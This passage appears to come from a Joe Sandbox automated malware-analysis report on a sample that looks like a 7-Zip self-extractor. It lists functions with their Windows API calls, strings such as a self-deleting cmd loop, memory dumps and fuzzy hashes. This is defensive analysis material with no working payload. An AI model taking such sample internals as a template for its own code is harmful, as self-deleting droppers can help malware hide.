                                                                    • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                    Function 00413370 Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                    • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                    • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                    • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                    Function 004139D1 Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                    • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                    • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                    • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                    Function 00413AAB Relevance: .1, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                    • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                                    Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                                    • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                                    • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                                    • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                                    • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                                    • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                    • String ID: " -$sfxwaitall
                                                                    • API String ID: 2734624574-3991362806
                                                                    • Opcode ID: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
                                                                    • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                                    • Opcode Fuzzy Hash: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
                                                                    • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                                    Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                                    • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                                    • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                                    • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                                    • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                                    • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                    • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                    • API String ID: 3007203151-3467708659
                                                                    • Opcode ID: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
                                                                    • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                                    • Opcode Fuzzy Hash: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
                                                                    • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                                    Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                                    • GetParent.USER32(?), ref: 0040319B
                                                                    • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                                    • GetMenu.USER32(?), ref: 004031C2
                                                                    • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                                    • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                                    • DestroyWindow.USER32(?), ref: 00403210
                                                                    • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                                    • GetSysColor.USER32(0000000F), ref: 00403229
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                                    • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                    • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                    • API String ID: 3514532227-2281146334
                                                                    • Opcode ID: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
                                                                    • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                                    • Opcode Fuzzy Hash: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
                                                                    • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                                    Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                    • LoadIconW.USER32(00000000), ref: 00408717
                                                                    • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                    • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                    • LoadImageW.USER32(00000000), ref: 0040873C
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                    • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                    • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                    • GetWindow.USER32(?,00000005), ref: 004088C3
                                                                    • GetWindow.USER32(?,00000005), ref: 004088DF
                                                                    • GetWindow.USER32(?,00000005), ref: 004088F7
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                                    • LoadIconW.USER32(00000000), ref: 0040895E
                                                                    • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                                    • SendMessageW.USER32(00000000), ref: 00408980
                                                                      • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                                      • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                    • String ID:
                                                                    • API String ID: 3694754696-0
                                                                    • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                    • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                    • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                    • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                    Function 00404B06 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 207stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00928E78,00404926), ref: 0040224B
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00928E78), ref: 0040225B
                                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                    • _wtol.MSVCRT ref: 00404CDF
                                                                    • _wtol.MSVCRT ref: 00404CFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                    • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                                    • API String ID: 2725485552-1675048025
                                                                    • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                    • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                    • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                    • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                    Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                    • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                    • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                    • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                    • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                    • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                    • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                    • String ID:
                                                                    • API String ID: 3462224810-0
                                                                    • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                    • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                    • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                    • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                    Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                    • GetMenu.USER32(?), ref: 0040202E
                                                                      • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                      • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                      • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                      • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                      • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                    • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                    • CoInitialize.OLE32(00000000), ref: 00402076
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                      • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                      • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                      • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                      • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                      • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                      • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                      • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                      • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                      • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                      • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                      • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                      • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                    • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                    • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                    • String ID: IMAGES$STATIC
                                                                    • API String ID: 4202116410-1168396491
                                                                    • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
